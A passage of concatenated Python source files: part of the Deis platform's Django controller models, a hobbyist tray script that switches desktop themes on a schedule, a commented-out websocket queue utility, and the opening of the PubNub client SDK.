time.sleep(20) for i in xrange(len(intervals)): delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0)) try: # sleep until the initial timeout is over if delay > 0: time.sleep(delay * intervals[i]) self._do_healthcheck(containers, config) break except exceptions.HealthcheckException as e: try: next_delay = delay * intervals[i+1] msg = "{}; trying again in {} seconds".format(e, next_delay) log_event(self, msg, logging.WARNING) except IndexError: log_event(self, e, logging.WARNING) else: self._destroy_containers(containers) msg = "aborting, app containers failed to respond to health check" log_event(self, msg, logging.ERROR) raise RuntimeError(msg) def _do_healthcheck(self, containers, config): path = config.get('HEALTHCHECK_URL', '/') timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1)) if not _etcd_client: raise exceptions.HealthcheckException('no etcd client available') for container in containers: try: key = "/deis/services/{self}/{container.job_id}".format(**locals()) url = "http://{}{}".format(_etcd_client.get(key).value, path) response = requests.get(url, timeout=timeout) if response.status_code != requests.codes.OK: raise exceptions.HealthcheckException( "app failed health check (got '{}', expected: '200')".format( response.status_code)) except (requests.Timeout, requests.ConnectionError, KeyError) as e: raise exceptions.HealthcheckException( 'failed to connect to container ({})'.format(e)) def _restart_containers(self, to_restart): """Restarts containers via the scheduler""" if not to_restart: return stop_threads = [Thread(target=c.stop) for c in to_restart] start_threads = [Thread(target=c.start) for c in to_restart] [t.start() for t in stop_threads] [t.join() for t in stop_threads] if any(c.state != 'created' for c in to_restart): err = 'warning, some containers failed to stop' log_event(self, err, logging.WARNING) [t.start() for t in start_threads] [t.join() for t in start_threads] if any(c.state != 'up' for c in to_restart): err = 'warning, some containers failed to start' log_event(self, err, logging.WARNING) def _destroy_containers(self, to_destroy): """Destroys containers via the scheduler""" if not to_destroy: return destroy_threads = [Thread(target=c.destroy) for c in to_destroy] [t.start() for t in destroy_threads] [t.join() for t in destroy_threads] [c.delete() for c in to_destroy if c.state == 'destroyed'] if any(c.state != 'destroyed' for c in to_destroy): err = 'aborting, failed to destroy some containers' log_event(self, err, logging.ERROR) raise RuntimeError(err) def deploy(self, user, release): """Deploy a new release to this application""" existing = self.container_set.exclude(type='run') new = [] scale_types = set() for e in existing: n = e.clone(release) n.save() new.append(n) scale_types.add(e.type) if new and "deploy" in dir(self._scheduler): self._deploy_app(scale_types, release, existing) else: self._start_containers(new) # destroy old containers if existing: self._destroy_containers(existing) # perform default scaling if necessary if self.structure == {} and release.build is not None: self._default_scale(user, release) def _deploy_app(self, scale_types, release, existing): for scale_type in scale_types: image = release.image version = "v{}".format(release.version) kwargs = {'memory': release.config.memory, 'cpu': release.config.cpu, 'tags': release.config.tags, 'aname': self.id, 'num': 0, 'version': version} job_id = self._get_job_id(scale_type) command = self._get_command(scale_type) try: self._scheduler.deploy( name=job_id, image=image, command=command, 
**kwargs) except Exception as e: err = '{} (deploy): {}'.format(job_id, e) log_event(self, err, logging.ERROR) raise [c.delete() for c in existing] def _default_scale(self, user, release): """Scale to default structure based on release type""" # if there is no SHA, assume a docker image is being promoted if not release.build.sha: structure = {'cmd': 1} # if a dockerfile exists without a procfile, assume docker workflow elif release.build.dockerfile and not release.build.procfile: structure = {'cmd': 1} # if a procfile exists without a web entry, assume docker workflow elif release.build.procfile and 'web' not in release.build.procfile: structure = {'cmd': 1} # default to heroku workflow else: structure = {'web': 1} self.scale(user, structure) def logs(self, log_lines=str(settings.LOG_LINES)): """Return aggregated log data for this application.""" path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log') if not os.path.exists(path): raise EnvironmentError('Could not locate logs') data = subprocess.check_output(['tail', '-n', log_lines, path]) return data def run(self, user, command): """Run a one-off command in an ephemeral app container.""" # FIXME: remove the need for SSH private keys by using # a scheduler that supports one-off admin tasks natively if not settings.SSH_PRIVATE_KEY: raise EnvironmentError('Support for admin commands is not configured') if self.release_set.latest().build is None: raise EnvironmentError('No build associated with this release to run this command') # TODO: add support for interactive shell msg = "{} runs '{}'".format(user.username, command) log_event(self, msg) c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1 # create database record for run process c = Container.objects.create(owner=self.owner, app=self, release=self.release_set.latest(), type='run', num=c_num) image = c.release.image # check for backwards compatibility def _has_hostname(image): repo, tag = dockerutils.parse_repository_tag(image) return True if '/' in repo and '.' in repo.split('/')[0] else False if not _has_hostname(image): image = '{}:{}/{}'.format(settings.REGISTRY_HOST, settings.REGISTRY_PORT, image) # SECURITY: shell-escape user input escaped_command = command.replace("'", "'\\''") return c.run(escaped_command) @python_2_unicode_compatible class Container(UuidAuditedModel): """ Docker container used to securely host an application process. 
""" owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') release = models.ForeignKey('Release') type = models.CharField(max_length=128, blank=False) num = models.PositiveIntegerField() @property def _scheduler(self): return self.app._scheduler @property def state(self): return self._scheduler.state(self.job_id).name def short_name(self): return "{}.{}.{}".format(self.app.id, self.type, self.num) short_name.short_description = 'Name' def __str__(self): return self.short_name() class Meta: get_latest_by = '-created' ordering = ['created'] @property def job_id(self): version = "v{}".format(self.release.version) return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals()) def _get_command(self): try: # if this is not procfile-based app, ensure they cannot break out # and run arbitrary commands on the host # FIXME: remove slugrunner's hardcoded entrypoint if self.release.build.dockerfile or not self.release.build.sha: return "bash -c '{}'".format(self.release.build.procfile[self.type]) else: return 'start {}'.format(self.type) # if the key is not present or if a parent attribute is None except (KeyError, TypeError, AttributeError): # handle special case for Dockerfile deployments return '' if self.type == 'cmd' else 'start {}'.format(self.type) _command = property(_get_command) def clone(self, release): c = Container.objects.create(owner=self.owner, app=self.app, release=release, type=self.type, num=self.num) return c @close_db_connections def create(self): image = self.release.image kwargs = {'memory': self.release.config.memory, 'cpu': self.release.config.cpu, 'tags': self.release.config.tags} try: self._scheduler.create( name=self.job_id, image=image, command=self._command, **kwargs) except Exception as e: err = '{} (create): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise @close_db_connections def start(self): try: self._scheduler.start(self.job_id) except Exception as e: err = '{} (start): {}'.format(self.job_id, e) log_event(self.app, err, logging.WARNING) raise @close_db_connections def stop(self): try: self._scheduler.stop(self.job_id) except Exception as e: err = '{} (stop): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise @close_db_connections def destroy(self): try: self._scheduler.destroy(self.job_id) except Exception as e: err = '{} (destroy): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise def run(self, command): """Run a one-off command""" if self.release.build is None: raise EnvironmentError('No build associated with this release ' 'to run this command') image = self.release.image entrypoint = '/bin/bash' # if this is a procfile-based app, switch the entrypoint to slugrunner's default # FIXME: remove slugrunner's hardcoded entrypoint if self.release.build.procfile and \ self.release.build.sha and not \ self.release.build.dockerfile: entrypoint = '/runner/init' command = "'{}'".format(command) else: command = "-c '{}'".format(command) try: rc, output = self._scheduler.run(self.job_id, image, entrypoint, command) return rc, output except Exception as e: err = '{} (run): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise @python_2_unicode_compatible class Push(UuidAuditedModel): """ Instance of a push used to trigger an application build """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') sha = models.CharField(max_length=40) fingerprint = models.CharField(max_length=255) receive_user = 
models.CharField(max_length=255) receive_repo = models.CharField(max_length=255) ssh_connection = models.CharField(max_length=255) ssh_original_command = models.CharField(max_length=255) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'uuid'),) def __str__(self): return "{0}-{1}".format(self.app.id, self.sha[:7]) @python_2_unicode_compatible class Build(UuidAuditedModel): """ Instance of a software build used by runtime nodes """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') image = models.CharField(max_length=256) # optional fields populated by builder sha = models.CharField(max_length=40, blank=True) procfile = JSONField(default={}, blank=True) dockerfile = models.TextField(blank=True) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'uuid'),) def create(self, user, *args, **kwargs): latest_release = self.app.release_set.latest() source_version = 'latest' if self.sha: source_version = 'git-{}'.format(self.sha) new_release = latest_release.new(user, build=self, config=latest_release.config, source_version=source_version) try: self.app.deploy(user, new_release) return new_release except RuntimeError: new_release.delete() raise def save(self, **kwargs): try: previous_build = self.app.build_set.latest() to_destroy = [] for proctype in previous_build.procfile: if proctype not in self.procfile: for c in self.app.container_set.filter(type=proctype): to_destroy.append(c) self.app._destroy_containers(to_destroy) except Build.DoesNotExist: pass return super(Build, self).save(**kwargs) def __str__(self): return "{0}-{1}".format(self.app.id, self.uuid[:7]) @python_2_unicode_compatible class Config(UuidAuditedModel): """ Set of configuration values applied as environment variables during runtime execution of the Application. """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') values = JSONField(default={}, blank=True) memory = JSONField(default={}, blank=True) cpu = JSONField(default={}, blank=True) tags = JSONField(default={}, blank=True) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'uuid'),) def __str__(self): return "{}-{}".format(self.app.id, self.uuid[:7]) def save(self, **kwargs): """merge the old config with the new""" try: previous_config = self.app.config_set.latest() for attr in ['cpu', 'memory', 'tags', 'values']: # Guard against migrations from older apps without fixes to # JSONField encoding. try: data = getattr(previous_config, attr).copy() except AttributeError: data = {} try: new_data = getattr(self, attr).copy() except AttributeError: new_data = {} data.update(new_data) # remove config keys if we provided a null value [data.pop(k) for k, v in new_data.viewitems() if v is None] setattr(self, attr, data) except Config.DoesNotExist: pass return super(Config, self).save(**kwargs) @python_2_unicode_compatible class Release(UuidAuditedModel): """ Software release deployed by the application platform Releases contain a :class:`Build` and a :class:`Config`. 
""" owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') version = models.PositiveIntegerField() summary = models.TextField(blank=True, null=True) config = models.ForeignKey('Config') build = models.ForeignKey('Build', null=True) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'version'),) def __str__(self): return "{0}-v{1}".format(self.app.id, self.version) @property def image(self): return '{}:v{}'.format(self.app.id, str(self.version)) def new(self, user, config, build, summary=None, source_version='latest'): """ Create a new application release using the provided Build and Config on behalf of a user. Releases start at v1 and auto-increment. """ # construct fully-qualified target image new_version = self.version + 1 # create new release and auto-increment version release = Release.objects.create( owner=user, app=self.app, config=config, build=build, version=new_version, summary=summary) try: release.publish() except EnvironmentError as e: # If we cannot publish this app, just log and carry on log_event(self.app, e) pass return release def publish(self, source_version='latest'): if self.build is None: raise EnvironmentError('No build associated with this release to publish') source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version source_image = '{}:{}'.format(self.build.image, source_tag) # IOW, this image did not come from the builder # FIXME: remove check for mock registry module if not self.build.sha and 'mock' not in settings.REGISTRY_MODULE: # we assume that the image is not present on our registry, # so shell out a task to pull in the repository data = { 'src': self.build.image } requests.post( '{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL, self.app.id), data=data, ) # update the source image to the repository we just imported source_image = self.app.id # if the image imported had a tag specified, use that tag as the source if ':' in self.build.image: if '/' not in self.build.image[self.build.image.rfind(':') + 1:]: source_image += self.build.image[self.build.image.rfind(':'):] publish_release(source_image, self.config.values, self.image) def previous(self): """ Return the previous Release to this one. 
:return: the previous :class:`Release`, or None """ releases = self.app.release_set if self.pk: releases = releases.exclude(pk=self.pk) try: # Get the Release previous to this one prev_release = releases.latest() except Release.DoesNotExist: prev_release = None return prev_release def rollback(self, user, version): if version < 1: raise EnvironmentError('version cannot be below 0') summary = "{} rolled back to v{}".format(user, version) prev = self.app.release_set.get(version=version) new_release = self.new( user, build=prev.build, config=prev.config, summary=summary, source_version='v{}'.format(version)) try: self.app.deploy(user, new_release) return new_release except RuntimeError: new_release.delete() raise def save(self, *args, **kwargs): # noqa if not self.summary: self.summary = '' prev_release = self.previous() # compare this build to the previous build old_build = prev_release.build if prev_release else None old_config = prev_release.config if prev_release else None # if the build changed, log it and who pushed it if self.version == 1: self.summary += "{} created initial release".format(self.app.owner) elif self.build != old_build: if self.build.sha: self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7]) else: self.summary += "{} deployed {}".format(self.build.owner, self.build.image) # if the config data changed, log the dict diff if self.config != old_config: dict1 = self.config.values dict2 = old_config.values if old_config else {} diff = dict_diff(dict1, dict2) # try to be as succinct as possible added = ', '.join(k for k in diff.get('added', {})) added = 'added ' + added if added else '' changed = ', '.join(k for k in diff.get('changed', {})) changed = 'changed ' + changed if changed else '' deleted = ', '.join(k for k in diff.get('deleted', {})) deleted = 'deleted ' + deleted if deleted else '' changes = ', '.join(i for i in (added, changed, deleted) if i) if changes: if self.summary: self.summary += ' and ' self.summary += "{} {}".format(self.config.owner, changes) # if the limits changed (memory or cpu), log the dict diff changes = [] old_mem = old_config.memory if old_config else {} diff = dict_diff(self.config.memory, old_mem) if diff.get('added') or diff.get('changed') or diff.get('deleted'): changes.append('memory') old_cpu = old_config.cpu if old_config else {} diff = dict_diff(self.config.cpu, old_cpu) if diff.get('added') or diff.get('changed') or diff.get('deleted'): changes.append('cpu') if changes: changes = 'changed limits for '+', '.join(changes) self.summary += "{} {}".format(self.config.owner, changes) # if the tags changed, log the dict diff changes = [] old_tags = old_config.tags if old_config else {} diff = dict_diff(self.config.tags, old_tags) # try to be as succinct as possible added = ', '.join(k for k in diff.get('added', {})) added = 'added tag ' + added if added else '' changed = ', '.join(k for k in diff.get('changed', {})) changed = 'changed tag ' + changed if changed else '' deleted = ', '.join(k for k in diff.get('deleted', {})) deleted = 'deleted tag ' + deleted if deleted else '' changes = ', '.join(i for i in (added, changed, deleted) if i) if changes: if self.summary: self.summary += ' and ' self.summary += "{} {}".format(self.config.owner, changes) if not self.summary: if self.version == 1: self.summary = "{} created the initial release".format(self.owner) else: self.summary = "{} changed nothing".format(self.owner) super(Release, self).save(*args, **kwargs) @python_2_unicode_compatible class Domain(AuditedModel): owner 
= models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') domain = models.TextField(blank=False, null=False, unique=True) def __str__(self): return self.domain @python_2_unicode_compatible class Certificate(AuditedModel): """ Public and private key pair used to secure application traffic at the router. """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) # there is no upper limit on the size of an x.509 certificate certificate = models.TextField(validators=[validate_certificate]) key = models.TextField() # X.509 certificates allow any string of information as the common name. common_name = models.TextField(unique=True) expires = models.DateTimeField() def __str__(self): return self.common_name def _get_certificate(self): try: return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate) except crypto.Error as e: raise SuspiciousOperation(e) def save(self, *args, **kwargs): certificate = self._get_certificate() if not self.common_name: self.common_name = certificate.get_subject().CN if not self.expires: # convert openssl's expiry date format to Django's DateTimeField format self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ') return super(Certificate, self).save(*args, **kwargs) @python_2_unicode_compatible class Key(UuidAuditedModel): """An SSH public key.""" owner = models.ForeignKey(settings.AUTH_USER_MODEL) id = models.CharField(max_length=128) public = models.TextField(unique=True, validators=[validate_base64]) fingerprint = models.CharField(max_length=128) class Meta: verbose_name = 'SSH Key' unique_together = (('owner', 'fingerprint')) def __str__(self): return "{}...{}".format(self.public[:18], self.public[-31:]) def save(self, *args, **kwargs): self.fingerprint = fingerprint(self.public) return super(Key, self).save(*args, **kwargs) # define update/delete callbacks for synchronizing # models with the configuration management backend def _log_build_created(**kwargs): if kwargs.get('created'): build = kwargs['instance'] # log only to the controller; this event will be logged in the release summary logger.info("{}: build {} created".format(build.app, build)) def _log_release_created(**kwargs): if kwargs.get('created'): release = kwargs['instance'] # log only to the controller; this event will be logged in the release summary logger.info("{}: release {} created".format(release.app, release)) # append release lifecycle logs to the app release.app.log(release.summary) def _log_config_updated(**kwargs): config = kwargs['instance'] # log only to the controller; this event will be logged in the release summary logger.info("{}: config {} updated".format(config.app, config)) def _log_domain_added(**kwargs): domain = kwargs['instance'] msg = "domain {} added".format(domain) log_event(domain.app, msg) def _log_domain_removed(**kwargs): domain = kwargs['instance'] msg = "domain {} removed".format(domain) log_event(domain.app, msg) def _log_cert_added(**kwargs): cert = kwargs['instance'] logger.info("cert {} added".format(cert)) def _log_cert_removed(**kwargs): cert = kwargs['instance'] logger.info("cert {} removed".format(cert)) def _etcd_publish_key(**kwargs): key = kwargs['instance'] _etcd_client.write('/deis/builder/users/{}/{}'.format( key.owner.username, fingerprint(key.public)), key.public) def _etcd_purge_key(**kwargs): key = kwargs['instance'] try: _etcd_client.delete('/deis/builder/users/{}/{}'.format( key.owner.username, fingerprint(key.public))) except KeyError: pass def _etcd_purge_user(**kwargs): username = 
kwargs['instance'].username try: _etcd_client.delete( '/deis/builder/users/{}'.format(username), dir=True, recursive=True) except KeyError: # If _etcd_publish_key() wasn't called, there is no user dir to delete. pass def _etcd_create_app(**kwargs): appname = kwargs['instance'] if kwargs['created']: _etcd_client.write('/deis/services/{}'.format(appname), None, dir=True) def _etcd_purge_app(**kwargs): appname = kwargs['instance'] try: _etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True) except KeyError: pass def _etcd_publish_cert(**kwargs): cert = kwargs['instance'] if kwargs['created']: _etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate) _etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key) def _etcd_purge_cert(**kwargs): cert = kwargs['instance'] try: _etcd_client.delete('/deis/certs/{}'.format(cert), prevExist=True, dir=True, recursive=True) except KeyError: pass def _etcd_publish_config(**kwargs): config = kwargs['instance'] # we purge all existing config when adding the newest instance. This is because # deis config:unset would remove an existing value, but not delete the # old config object try: _etcd_client.delete('/deis/config/{}'.format(config.app), prevExist=True, dir=True, recursive=True) except KeyError: pass if kwargs['created']: for k, v in config.values.iteritems(): _etcd_client.write( '/deis/config/{}/{}'.format( config.app, unicode(k).encode('utf-8').lower()), unicode(v).encode('utf-8')) def _etcd_purge_config(**kwargs): config = kwargs['instance'] try: _etcd_client.delete('/deis/config/{}'.format(config.app), prevExist=True, dir=True, recursive=True) except KeyError: pass def _etcd_publish_domains(**kwargs): domain = kwargs['instance'] if kwargs['created']: _etcd_client.write('/deis/domains/{}'.format(domain), domain.app) def _etcd_purge_domains(**kwargs): domain = kwargs['instance'] try: _etcd_client.delete('/deis/domains/{}'.format(domain), prevExist=True, dir=True, recursive=True) except KeyError: pass # Log significant app-related events post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log') post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log') post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log') post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log') post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log') post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log') post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log') # automatically generate a new token on creation @receiver(post_save, sender=get_user_model()) def create_auth_token(sender, instance=None, created=False, **kwargs): if created: Token.objects.create(user=instance) _etcd_client = get_etcd_client() if _etcd_client: post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models') post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models') post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models') post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models') post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models') post_save.connect(_etcd_create_app, sender=App, dispatch_uid='api.models') post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models') post_save.connect(_etcd_publish_cert, sender=Certificate, 
dispatch_uid='api.models') post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models') post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models') post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
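# Illustrative sketch (not part of the original module). Release.save() above
# relies on dict_diff() imported from the project's utils module, which is not
# shown here. Judging only from how its result is consumed (diff.get('added'),
# diff.get('changed'), diff.get('deleted')), a compatible implementation could
# look roughly like this; treat it as an assumption about the interface, not as
# the real Deis code:
def dict_diff_sketch(new, old):
    added = {k: v for k, v in new.items() if k not in old}
    changed = {k: v for k, v in new.items() if k in old and old[k] != v}
    deleted = {k: v for k, v in old.items() if k not in new}
    return {'added': added, 'changed': changed, 'deleted': deleted}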
sunset-gui.py
#!/usr/bin/python
# baby 1st python script
# needs pip install pystray
# needs pip install schedule
import os
import sys
import json
import schedule
import time
from datetime import datetime
from threading import Thread
import pystray
from pystray import Icon as icon, Menu as menu, MenuItem as item
from PIL import Image

PROGDIR = os.path.dirname(os.path.realpath(__file__))
PROGCONFIGDIR = PROGDIR + '/config'
PROGCONFIGFILE = PROGCONFIGDIR + '/gui-config.json'
PROGLOGFILE = PROGDIR + '/sunset.log'


def lightTheme():
    # load config.json (the with-block closes the file automatically)
    with open(PROGCONFIGFILE, 'r') as f:
        configs = json.load(f)
    # load json values into vars
    sunsetLocation = configs['sunsetLocation']
    lightThemeName = configs['lightTheme']
    lightThemeSetting = configs['lightThemeSetting']
    # send info to sunset
    os.system("bash " + sunsetLocation + " " + lightThemeSetting + " " + lightThemeName)


def darkTheme():
    # load config.json (the with-block closes the file automatically)
    with open(PROGCONFIGFILE, 'r') as f:
        configs = json.load(f)
    # load json values into vars
    sunsetLocation = configs['sunsetLocation']
    darkThemeName = configs['darkTheme']
    darkThemeSetting = configs['darkThemeSetting']
    # send info to sunset
    os.system("bash " + sunsetLocation + " " + darkThemeSetting + " " + darkThemeName)


def editConfig():
    os.system("kitty nano " + PROGCONFIGFILE)


def openLog():
    os.system("kitty nano " + PROGLOGFILE)


def scheduleFunction():
    while True:
        schedule.run_pending()
        time.sleep(1)


def iconTrayFunction():
    icon.run()


def test():
    now = datetime.now()
    print(now)


def quit():
    print('Quitting...')
    # https://stackoverflow.com/a/1489838
    # exit and kill all threads
    os._exit(1)


if __name__ == "__main__":
    image = Image.open(PROGCONFIGDIR + "/icon.png")
    menu = (item('Light theme', lightTheme),
            item('Dark Theme', darkTheme),
            item('More...', menu(
                item('Edit config', editConfig),
                item('Open log', openLog),
                item('Exit', quit))))
    icon = pystray.Icon("sunset", image, "sunset", menu)

    schedule.every().day.at("10:00").do(lightTheme)
    schedule.every().day.at("18:00").do(darkTheme)

    # create threads
    scheduleThread = Thread(target=scheduleFunction)
    trayIconThread = Thread(target=iconTrayFunction)
    # start threads
    scheduleThread.start()
    trayIconThread.start()
    # wait for thread completion
    scheduleThread.join()
    trayIconThread.join()
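# Illustrative sketch (not part of sunset-gui.py; start_scheduler_daemon is a
# hypothetical name). The script above dedicates one thread to
# schedule.run_pending() and another to the tray icon, then joins both. A common
# variation, sketched here rather than prescribed, runs the scheduler loop in a
# daemon thread so it stops automatically when the main thread exits:
import time
from threading import Thread

import schedule


def start_scheduler_daemon(poll_seconds=1):
    def _loop():
        while True:
            schedule.run_pending()
            time.sleep(poll_seconds)

    t = Thread(target=_loop, daemon=True)
    t.start()
    return t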
web_socket_util.py
# # -*- coding: utf-8 -*- # # import json # import os # import socket # import threading # from time import sleep # import time # # from dwebsocket.decorators import accept_websocket # # logger = logging.getLogger('django') # from comUtil import get_except # from httpUtil import HttpClass # from stringUtil import get_uuid, time_to_db, get_stamp_now, \ # dbtime_to_timestamp # from dbUtil import sql_exec # from SRMCenter.models.models import WebsocketMsg, WebsocketMsgPid # # # mutex = threading.Lock() # # # def initMsgQueue(): # """ # | ##@函数目的: 清理消息队列 # | ##@参数说明:https://github.com/duanhongyi/dwebsocket # | ##@返回值: # | ##@函数逻辑: # | ##@开发人:jhuang # | ##@时间: # """ # logger.debug('初始化消息队列...') # WebsocketMsgPid.objects.all().delete() # WebsocketMsg.objects.all().delete() # # threading.Thread(target=queryMsgQueue).start() # # # # def websocketServer_SendMsg(msgtype,msg): # # logger.debug('提交websocket消息到队列:%s' %(msg)) # WebsocketMsg(msg=msg,type=msgtype,msg_id=get_uuid(),send_time=time_to_db()).save() # # # # def queryMsgQueue(): # ''' # 检查是否有消息需要发送 # ''' # mutex.acquire() # logger.debug('监控websocket消息队列...') # while 1: # oWebsocketMsgs=WebsocketMsg.objects.all() # for r in oWebsocketMsgs: # msgtype=r.type # msg=r.msg # msg_id=r.msg_id # send_time= str(r.send_time ) # # print send_time # t2=dbtime_to_timestamp(send_time) # # print t2 # # print get_stamp_now() # oWebsocketMsgPids2=WebsocketMsgPid.objects.filter(msg_id=msg_id) # if get_stamp_now()-t2>60*1: # r.delete() # oWebsocketMsgPids2.delete() # # logger.debug('消息已经过期,清理消息...(msg_id:%s)'%(msg_id)) # # # oWebsocketMsgPids=WebsocketMsgPid.objects.filter(msg_id=msg_id,pid=os.getpid()) # if len(oWebsocketMsgPids)>0: # pass # # logger.debug('已经过,不在发送...') # # if len(oWebsocketMsgPids2)>=8: # # logger.debug('全部发送完成,清理消息...(msg_id:%s)'%(msg_id)) # # oWebsocketMsgPids2.delete() # # WebsocketMsgPid.objects.filter(msg_id=msg_id).delete() # # else: # sql_exec('insert into websocket_msg_pid (msg_id,pid) values(%s,%s)',[msg_id,os.getpid()],False) # _websocketServer_SendMsg(msgtype,msg) # # sleep(5) # # # # # # # # # clients = [] # # @accept_websocket # def websocketServer(request): # """ # | ##@函数目的: 开启一个websocke服务 # | ##@参数说明:https://github.com/duanhongyi/dwebsocket # | ##@返回值: # | ##@函数逻辑: # | ##@开发人:jhuang # | ##@时间: # """ # # logger.debug('开启websocket服务...') # try: # if request.is_websocket: # clients.append(request.websocket) # for message in request.websocket: # for client in clients: # if message!=None: # client.send(message) # except Exception as e: # clients.remove(request.websocket) # logger.error('uwebsocket 通道异常 :%s' %(get_except(e))) # # logger.info ( {0}'.format(ex)) # finally: # pass # # # # # # # # 向客户端推消息 # def _websocketServer_SendMsg(msgtype,msg): # msgdic={} # msgdic['msgType'] = unicode(msgtype).encode('UTF-8') # msgdic['msg'] = unicode(msg).encode('UTF-8') # msg=json.dumps(msgdic, ensure_ascii=False) # if len(clients)<=0 : # return False # # logger.debug('发送websocket消息,失败:无客户端连接!') # for client in clients: # try: # # logger.debug('发送websocket消息:%s' %(msg)) # client.send(msg) # except Exception , e: # logger.error( u'websocket发消息:{0} 出现异常 --> %s'%(get_except(e))) # # # # # # # # #
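# Illustrative sketch (not part of the commented-out module above). That disabled
# module queues websocket messages in the database and broadcasts them to every
# connected client, dropping clients whose channel has gone away. Stripped of the
# Django/dwebsocket and database plumbing, the core broadcast step reduces to
# something like this sketch (client objects are assumed to expose a send(text)
# method):
import json

clients = []  # connected websocket-like objects


def broadcast(msg_type, msg):
    payload = json.dumps({'msgType': msg_type, 'msg': msg}, ensure_ascii=False)
    dead = []
    for client in clients:
        try:
            client.send(payload)
        except Exception:
            dead.append(client)  # remember clients whose connection failed
    for client in dead:
        clients.remove(client)
    return bool(clients)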
pubnub.py
## www.pubnub.com - PubNub Real-time push service in the cloud. # coding=utf8 ## PubNub Real-time Push APIs and Notifications Framework ## Copyright (c) 2014-15 Stephen Blum ## http://www.pubnub.com/ ## ----------------------------------- ## PubNub 3.7.3 Real-time Push Cloud API ## ----------------------------------- try: import json except ImportError: import simplejson as json import time import hashlib import uuid as uuid_lib import random import sys import copy from base64 import urlsafe_b64encode from base64 import encodestring, decodestring import hmac from Crypto.Cipher import AES try: from hashlib import sha256 digestmod = sha256 except ImportError: import Crypto.Hash.SHA256 as digestmod sha256 = digestmod.new ##### vanilla python imports ##### try: from urllib.parse import quote except ImportError: from urllib2 import quote try: import urllib.request except ImportError: import urllib2 try: import requests from requests.adapters import HTTPAdapter except ImportError: pass #import urllib import socket import threading try: import urllib3.HTTPConnection default_socket_options = urllib3.HTTPConnection.default_socket_options except: default_socket_options = [] default_socket_options += [ # Enable TCP keepalive (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) ] if sys.platform.startswith("linux"): default_socket_options += [ # Send first keepalive packet 200 seconds after last data packet (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 200), # Resend keepalive packets every second, when unanswered (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1), # Close the socket after 5 unanswered keepalive packets (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5) ] elif sys.platform.startswith("darwin"): # From /usr/include/netinet/tcp.h # idle time used when SO_KEEPALIVE is enabled socket.TCP_KEEPALIVE = socket.TCP_KEEPALIVE \ if hasattr(socket, 'TCP_KEEPALIVE') \ else 0x10 # interval between keepalives socket.TCP_KEEPINTVL = socket.TCP_KEEPINTVL \ if hasattr(socket, 'TCP_KEEPINTVL') \ else 0x101 # number of keepalives before close socket.TCP_KEEPCNT = socket.TCP_KEEPCNT \ if hasattr(socket, 'TCP_KEEPCNT') \ else 0x102 default_socket_options += [ # Send first keepalive packet 200 seconds after last data packet (socket.IPPROTO_TCP, socket.TCP_KEEPALIVE, 200), # Resend keepalive packets every second, when unanswered (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1), # Close the socket after 5 unanswered keepalive packets (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5) ] """ # The Windows code is currently untested elif sys.platform.startswith("win"): import struct from urllib3.connectionpool import HTTPConnectionPool, HTTPSConnectionPool def patch_socket_keepalive(conn): conn.sock.ioctl(socket.SIO_KEEPALIVE_VALS, ( # Enable TCP keepalive 1, # Send first keepalive packet 200 seconds after last data packet 200, # Resend keepalive packets every second, when unanswered 1 )) class PubnubHTTPConnectionPool(HTTPConnectionPool): def _validate_conn(self, conn): super(PubnubHTTPConnectionPool, self)._validate_conn(conn) class PubnubHTTPSConnectionPool(HTTPSConnectionPool): def _validate_conn(self, conn): super(PubnubHTTPSConnectionPool, self)._validate_conn(conn) import urllib3.poolmanager urllib3.poolmanager.pool_classes_by_scheme = { 